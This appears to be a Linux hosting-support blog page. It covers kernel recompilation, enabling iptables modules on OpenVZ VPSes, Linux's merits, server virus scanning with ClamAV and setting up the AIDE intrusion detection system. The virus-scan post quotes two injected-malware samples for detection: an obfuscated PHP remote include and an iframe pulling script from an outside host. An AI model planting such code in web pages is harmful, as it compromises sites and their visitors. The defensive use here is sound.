How to recompile Kernel?

Kernel Recompilation

Compiling custom kernel has its own advantages and disadvantages.  It helps to optimize the kernel to your environment (hardware and usage patterns).  I shall try to guide you through Kernel recompilation process.

Step 1:

Download the kernel source

cd /usr/local/src

wget  http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2

Note: Replace x.y.z with actual version number.

Step 2:

Extract the  source file

tar -xjvf linux-x.y.z.tar.bz2

Step 3:

Patching the Kernel

If you are requested to apply any patches , follow these steps

a) Move the downloaded kernel patch to the /usr/local/src directory.

b)  Extract the patch file

c)  Patch the kernel  source using the extracted  patch file

cd /usr/local/src/linux-x.y.z

patch -p1 < patchfile-2.2.x

Now the  Kernel Source is patched against known  vulnerabilities.

Step 4:

Configuration

If you are trying to upgrade the Kernel of already running server , it is always better use the existing configuration. To do this follow these steps

#uname -a
Linux  Server1  2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

# cd /boot

There you can see different configuration files as given below

#ls

config-2.6.18-128.el5    initrd-2.6.18-128.el5.img  message
config-2.6.18-164.el5     initrd-2.6.18-164.el5.img  quota.user*

identify the configuration file corresponding to the version of OS installed , In our case it is config-2.6.18-164.el5 . We are  copying this file to the downloaded kernel source  to use it during configuration.

#cp -p config-2.6.18-164.el5 /usr/local/src/linux-x.y.z/.config

# make clean

# make mrproper

# make menuconfig

You have to select different options as per your need.   If you  intended to use the existing configuration ,specify the path to the file  ( .config in this case) by selecting the option

“Load an Alternative configuration file”

Step 5: Compilation

Compile the Kernel using the following commands

Compile to create a compressed kernel image

# make

Compile kernel modules:

# make modules

Install kernel modules

# make modules_install

Step 6: Install Kernel

If the above steps completed without any errors , now its the time to Install the new Kernel

# make install

It will install three files into /boot directory as well as modification to your kernel grub configuration file:

System.map-x.y.z

config-x.y.z

vmlinuz-x.y.z

Step 7:  Create the Initrd image

Type the following command :

# cd /boot

# mkinitrd -o initrd.img-x.y.x  x.y.z

initrd images contains device driver which needed to load rest of the operating system later on. Not all computer requires it, but it is  better  to create one

Step 8: Boot Loader Modification

Mofdify the boot loader to boot the new OS as default . Check the documentaions corresponding to your boot loader

Step 9: The last step

execute the following command

#reboot

Wait a few minutes and once it is up , you can see that the new Kernel is loaded :-)

Continue Reading

How to enable IPtable modules on a VPS

Before trying to enable iptable modules on the VPS, make sure that those modules are enabled on the root node server. To check whether the particular iptable modules are enabled or not on the root node, execute the following command.

lsmod

A Sample out put for the lsmod is :

Module                  Size  Used by
xt_helper              35584  0
ip_conntrack_ftp       42320  2
ipt_LOG                39808  0
ipt_owner              34944  0
ipt_REDIRECT           34944  0
ipt_recent             43404  2
xt_state               35200  5
sch_sfq                38912  1
cls_u32                41352  1
sch_cbq                50688  1
ppp_deflate            39168  0
zlib_deflate           52760  1 ppp_deflate
ppp_async              45184  0
ppp_generic            62624  2 ppp_deflate,ppp_async
slhc                   39552  1 ppp_generic
crc_ccitt              35200  1 ppp_async
tun                    47872  0
vzethdev               47264  0
simfs                  38296  36
vzrst                 173096  0
vzcpt                 148792  0
vzdquota               78832  36 [permanent]
xt_tcpudp              36224  21
xt_length              34944  0
ipt_ttl                34816  0
xt_tcpmss              35328  0
ipt_TCPMSS             37248  0
iptable_mangle         37888  36
xt_multiport           36224  0
xt_limit               36352  4
ipt_tos                34560  0
ipt_REJECT             39556  1
iptable_nat            43532  46
ip_nat                 53392  3 ipt_REDIRECT,vzrst,iptable_nat
iptable_filter         37760  42
ip_conntrack          100884  29 xt_helper,ip_conntrack_ftp,xt_state,vzrst,vzcpt,iptable_nat,ip_nat
nfnetlink              40392  2 ip_nat,ip_conntrack
ip_tables              57440  3 iptable_mangle,iptable_nat,iptable_filter
x_tables               52744  17 xt_helper,ipt_LOG,ipt_owner,ipt_REDIRECT,ipt_recent,xt_state,xt_tcpudp,xt_length,ipt_ttl,xt_tcpmss,ipt_TCPMSS,xt_multiport,xt_limit,ipt_tos,ipt_REJECT,iptable_nat,ip_tables
autofs4                57480  2
hidp                   83584  2
rfcomm                105000  0

Here we can see most of the modules are already enabled on the node server. If not enabled, execute the following commands one by one to enable those.

modprobe ipt_helper
modprobe ipt_REDIRECT
modprobe ipt_state
modprobe ipt_TCPMSS
modprobe ipt_LOG
modprobe ipt_TOS
modprobe iptable_nat
modprobe ipt_length
modprobe ipt_tcpmss
modprobe iptable_mangle
modprobe ipt_limit
modprobe ipt_tos
modprobe iptable_filter
modprobe ipt_helper
modprobe ipt_tos
modprobe ipt_ttl
modprobe ipt_REJECT
modprobe ipt_helper
modprobe ipt_owner

Next step is to enable these modules on the VPS.

Stop the container first :  vzctl stop 960 ( replace 960 with the concerned VPS ID )

Execute the following command :

vzctl set 960 –iptables ipt_REJECT –iptables ipt_tos –iptables ipt_TOS –iptables ipt_LOG –iptables ip_conntrack –iptables ipt_limit –iptables ipt_multiport –iptables iptable_filter –iptables iptable_mangle –iptables ipt_TCPMSS –iptables ipt_tcpmss –iptables ipt_ttl –iptables ipt_length –iptables ipt_state –iptables iptable_nat –iptables ip_nat_ftp –iptables ip_conntrack_ftp –iptables ip_conntrack_irc –iptables ip_nat_irc –iptables ipt_owner –iptables ipt_helper –save

Start the container : vzctl start 960

check whether the modules are enabled from the configuration file cat /etc/vz/conf/960.conf. You are DONE.

Please note that if the command “vzctl set 960 –iptables ipt_ ….” is executed for the second time for the same VPS, it will over write the previous configuration.

For enabling it on all VPSes, please add to /etc/sysconfig/vz all those modules like IPTABLES=”module1 module2 ….etc”

Continue Reading

Chapter 2 Why Linux is important?

Linux has its own importance nowadays days due to the following reasons, which other OS’s may not have !

  1. Freedom’s in Linux :-
  2. If you have been following the Open Source movement, you know I am not talking about the price of the software when I say freedom.

    Free not as in free drinks. But Free as in Freedom or Free speech. In most cases, you get free drinks though :-)

    Freedom 0 – The freedom to run the program, for any purpose :-
    Yes, the users have the freedom to run the program for any purposes like software development, animation, designing, desktops etc. We can run the program without any prior license from any authorities.

    Freedom 1 – The freedom to study.
    In Linux we have got the freedom to study how the program works, and adapt it according to our needs. Access to the source code is a precondition for this, which is allowed in Linux.

    Freedom 2 – The freedom to redistribute the copies.
    We can distribute our copy of linux through dvd’s, pen-drives etc, so that we can help our neighbor & fellow human beings.

    Freedom 3 – The freedom to improve the program.
    Since we have the access to the source code, we can modify it and release our improvements to the public, so that the whole community benefits.

    A program is free software if users have all of these freedoms.

    And for a desktop user, most importantly, the freedom from viruses, as long as you use the software downloaded from the software repository of your OS :-)

  3. Multi-User Environment:-
  4. Linux supports multi-user enviornment, ie several users are allowed to login to the same system with different permissions.

  5. Potability :-
  6. Linux is  portable. It is possible to reuse the existing code instead of creating new code when moving software from an environment to another. The portability is the key issue for development cost reduction.

  7. Intimate knowledge of the hardware :-
  8. Noting better than Linux to know your machine’s hardware information. A detailed information could be seen using a command ‘lspci’.(use option -vvv for more detailed info)

    supportsage@supportsage-desktop:~$ lspci
    00:00.0 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    00:00.1 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    00:00.2 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    00:00.3 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    00:00.4 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    00:00.7 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI bridge [K8T800/K8T890 South]
    00:0f.0 IDE interface: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80)
    00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06)
    00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
    00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
    00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
    00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
    00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86)
    00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South]
    00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60)
    00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 78)
    00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration
    00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map
    00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller
    00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control
    01:00.0 VGA compatible controller: VIA Technologies, Inc. S3 Unichrome Pro VGA Adapter (rev 01)

    An example for more detailed hardware information is given below.

    supportsage@supportsage-desktop:~$ lspci -vvv
    00:00.0 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
    Subsystem: VIA Technologies, Inc. K8M800 Host Bridge
    Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B-
    Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort+ >SERR- <PERR-
    Latency: 8
    Region 0: Memory at e8000000 (32-bit, prefetchable) [size=128M]
    Capabilities: <access denied>

  9. No BSOD – Blue Screen of Death :-
  10. The BSOD is a colloquialism used for the error screen displayed by some other operating systems. And a Linux based system is free from this.

  11. Upgradeability :-
  12. The Linux systems could be upgraded quite easily, with the help of on-line repositories. Upgradation is possible without any changes in the system configuration and saved data’s.

  13. Customization :-
  14. Linux machine can be easily customised accourding to the user expectations. I leave , how to customise Linux to your imagination.

  15. Security – viruses, worms and trojans :-
  16. Linux machines are well known for its security. 65% of the server are running on Linux based machines. Linux machines are very less infected by viruses, worms and trojans.

  17. Maturity – Stable, Reliable and Extremely powerful :-
  18. Another fine reason for using server’s based on Linux is its ’stability’ & ‘reliability’. No reboot is needed, except for kernel upgrades. OS like windows XP need a reboot, even a new application software is installed.

  19. Support :-
  20. You can get support for Linux from millions of forums, live IRC’s and even from your local LUG(Linux User Group). All are there to help you :)

  21. Complete development environment :-
  22. A C compiler for Windows alone would set you back hundreds of dollars. Whereas in Linux, most of the development libraries like gcc, perl, python, javac etc comes built-in.

Continue Reading

How to do virus scan on Linux servers ?

Do you really need to do virus scan on Linux servers ? Sometimes yes. With the recent high level of iframe/php include/js injections, it seems we need to scan the pages for iframe injections, like below

< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >

Below are a few URLs which could help you in the process

http://www.google.com/safebrowsing/diagnostic?site=http://supportsages.com
http://www.malwaredomains.com/
http://www.malwaredomainlist.com/mdl.php – A regularly updated list.

You can install clamav antivirus which is open source and do a clamav scan to make sure that the website is not affected. On a cPanel server, the below command will scan the entire website files of each users.

clamscan -i -r –remove /home/*/public_html/

Why would I recommend clamav over other paid antivirus ? For obvious reasons that you can edit ClamAV rules to include more iframe detection rules. Just write a new regex rules in the clamav virus DBs and you have the situation under control, at least for those matching iframe codes.

Other solution would be mod_security 2.5 that could help preventing the page alteration using SQL injection and javascript injection and threats detailed in http://www.gnucitizen.org/blog/atom-2/

Here I was talking about server security. Once infected, there are a few things client has to do as well.

1. Scan your machine as well as your webmaster’ with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostics tools of your choice (like Unmask Parasites ) to be sure your site is clean.

Continue Reading

AIDE to aid your server security needs

A note on Intrusion Detection System
An Intrusion detection system (or IDS) is a software or hardware designed to detect unwanted attempts at accessing, manipulating, and/or disabling of computer systems through a network. Some of the best IDS applications know are Snort, Untangle, Tripwire, AIDE etc. Among the simplest to configure and use is AIDE.

What is AIDE
AIDE (Advanced Intrusion Detection Environment) is an intrusion detection program. It is a free replacement for Tripwire. AIDE constructs a database of the files specified in AIDE’s configuration file. The AIDE database stores various file attributes like permissions, inode number, user, group, file size, mtime and ctime, atime, growing size, number of links and link name. AIDE also creates a cryptographic checksum or hash of each file using message digest algorithms like sha, md5, rmd160, tiger etc. Also acl, xattr and selinux can be used if enabled during compile time.

Initially the administrator has to create an AIDE database on a new server before it is setup for networking or business (eg hosting). This AIDE database is a summary of the system in it’s normal state.It will hold information about system binaries, libraries, header files etc that are expected to remain the same over time.

Suppose someone has broken-into the system, though it is easier to manipulate file dates, sizes etc, it will be quite difficult for him to manipulate cryptographic checksum like md5. Thus by rerunning AIDE after a break-in, the administrator can quickly identify changes to files with high degree of accuracy.

AIDE Compilation
Some of the prerequisites (packages) for AIDE are:

  • GCC compiler for C (gcc)
  • GNU Flex (flex)
  • GNU Bison (bison)
  • GNU Make (make)
  • Mhash library (libmhash2 and libmhash-dev)
  • PostgreSQL Development Library (postgresql-server-dev)

Simple instructions using Ubuntu
Firstly become root by using the given command and then supplying your password:
sudo su -

For each prerequisite (say package gcc) search if it is installed or not by:
dpkg –get-selections|grep gcc

If you get:
gcc-4.3        install
then gcc is installed otherwise if you get no output then it means that gcc is not installed.

If the package gcc is not installed then use:
sudo apt-get install gcc

Once all the packages are installed then download aide from sourceforge.net/projects/aide. It will be a gzipped tar archive.

create a folder packages and extract the tar achieve in this folder using the command:
tar -xzvf aide-x.xx.x.tar.gz (replace x with version number)
now a folder by name aide-x.xx.x will be created

go inside that folder by:
cd aide-x.xx.x

now execute:
./configure
make
make install
make clean

open the aide config file and determine where the aide database is stored. Go to that location

To initialise the database perform:
aide -i
mv aide.db.new aide.db
then to check if aide works execute:
aide

Configuration of AIDE
AIDE has its config file located inside (if installed via package management software like synaptic, config file is /etc/aide/aide.conf) /usr/local/etc/aide.conf .
And it’s default executable is located inside /usr/local/bin/aide.

Explanation of the aide.conf file

database=file:/var/lib/aide/aide.db
location of the database to be read (This is the database taken as benchmark)

database_new=file:/var/lib/aide/aide.db.comp
location of the database for –compare is read (This is not present by default and is used only when we have to compare two distinct databases.)

database_out=file:/var/lib/aide/aide.db.new
location of the database to be written

AIDE uses a set of rules to determine what to check for within a particular file or directory. This is found inside aide.conf. These rules are also called groups.

#p:      permissions
#i:      inode
#n:      number of links
#l:      link name
#u:      user
#g:      group
#s:      size
#b:      block count
#m:      mtime
#a:      atime
#c:      ctime
#S:      check for growing size
#I:      ignore changed filename
#md5:    md5 checksum
#sha1:   sha1 checksum
#sha256: sha256 checksum
#sha512: sha512 checksum
#rmd160: rmd160 checksum
#tiger:  tiger checksum
#haval:  haval checksum
#crc32:  crc32 checksum
#E:        Empty group
#>:      Growing logfile p+l+u+g+i+n+S

These basic rules are then grouped to custom rules which define the collection of rules they comply to for example ‘pug: p+u+g’ means pug supports permissions, user and group rules together. You can alse create custom rules

#R:      p+i+l+n+u+g+s+m+c+acl+selinux+xattrs+md5
#L:      p+i+l+n+u+g+acl+selinux+xattrs
#MyRule: p+i+l+n+u+g

The following are available if you have mhash support enabled:

#gost:   gost checksum
#whirlpool: whirlpool checksum

The following are available when explicitly enabled using configure:

#acl:    access control list
#selinux SELinux security context
#xattr:  extended file attributes

AIDE has three types of selection lines

  • Regular selection lines, beginning with “/”. This line is a file/dirctory path with or without regular expressions followed by a rule to be used here.
  • Equals selection lines, beginning with “=”. This line is followed by a path to directory/file and tells aide not to proceed the rule into any subdirectory or file.
  • Negative selection lines, beginning with “!”. This line is followed by a path to directory/file and tells aide what files/directories to ignore in database.

Next we have to decide what directories/files you want in the database

/etc p+i+u+g     #check only permissions, inode, user and group for etc
/bin MyRule      # apply the custom rule to the files in bin
/sbin MyRule     # apply the same custom rule to the files in sbin
/var MyRule
!/var/log/.*     # ignore the log dir it changes too often
!/var/spool/.*   # ignore spool dirs as they change too often
!/var/adm/utmp$  # ignore the file /var/adm/utmp

URLS that can be used
we have URLs in the database and database_out portion of aide.conf. These Urls can be any of the following. Input urls cannot be used as outputs and vice versa.

stdout

stderr Output is sent to stdout,stderr respectively.

stdin  Input is read from stdin.

file://filename
Input is read from filename or output is written to filename.

fd:number
Input is read from file-descriptor number or output is written to
number.

Useful Commands
aide -C : Performs a check on the filesystem ? (also same as: aide)
aide -i : Initialises or creates the benchmark database supplied by database_out directive (here it is aide.db.new)
aide -u -c /etc/aide.conf : update the database and use the specified config file

Usage
Before putting one’s server into the network, the admin will have to save a secure configuration of the system by:

aide -i

mv aide.db.new aide.db

The second command transfers the server’s earlier state(aide.db database) with the new one(aide.db.new). So be careful when you do this. It is advisable to keep a backup of the earlier database.

Next time in-order to check for any break-in perform
aide
or
aide -C

To compare the current database with some earlier backed-up database, give the path of the backed-up database to database_new option in aide.conf and perform:
aide –compare

The task of saving the old database and comparing with a new one has to be done periodically (preferably daily with the help of a cron task).

Reference Links

http://www.cs.tut.fi/~rammer/aide.html (Home Page)

http://sourceforge.net/projects/aide (Sourceforge Project Page)

http://www.cs.tut.fi/~rammer/aide/manual.html (Manual Page)

http://www.securityfocus.com/infocus/1424 (Reference)

http://www.penguin-soft.com/penguin/man/5/aide.conf.html (Reference)

Continue Reading

About this blog

This blog, acts as a knowledge repository for the world and is unofficial! Anything we find interesting in the cyber world will go here. Most cases, this blog will reflect the happiness of our staff in reaching successful solution to an issue (s)he worked on. A reference for other fellow SAGEs who come across similar issues later